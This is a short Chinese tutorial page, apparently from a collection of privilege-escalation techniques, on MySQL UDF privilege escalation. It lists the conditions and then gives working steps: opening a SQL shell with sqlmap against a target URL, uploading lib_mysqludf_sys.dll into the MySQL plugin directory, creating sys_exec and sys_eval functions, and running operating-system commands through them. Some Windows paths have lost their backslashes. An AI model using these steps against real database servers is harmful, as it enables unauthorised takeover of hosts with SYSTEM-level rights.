首页 提权合集

udf提权

1.原理

UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限

2.利用条件

Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。
Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32,在windows2000下放置于
c:winntsystem32。

掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,
具备`root账号所具备的权限的其它账号也可以。

可以将udf.dll写入到相应目录的权限。

1.连接mysql数据打开一个交互shell:

sqlmap.py -u "url" --sql-shell
select @@version;
select @@plugin_dir;
C:XXXX\mysql\mysql5.6.17\lib\plugin\

2.利用sqlmap上传lib_mysqludf_sys到MySQL插件目录:

sqlmap.py -u "url" --file-write=自己的目录/lib_mysqludf_sys.dll --file-dest=C:XXXX\\mysql\mysql5.6.17\lib\plugin\lib_mysqludf_sys.dll
CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll'
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'
select sys_eval('ver');



目录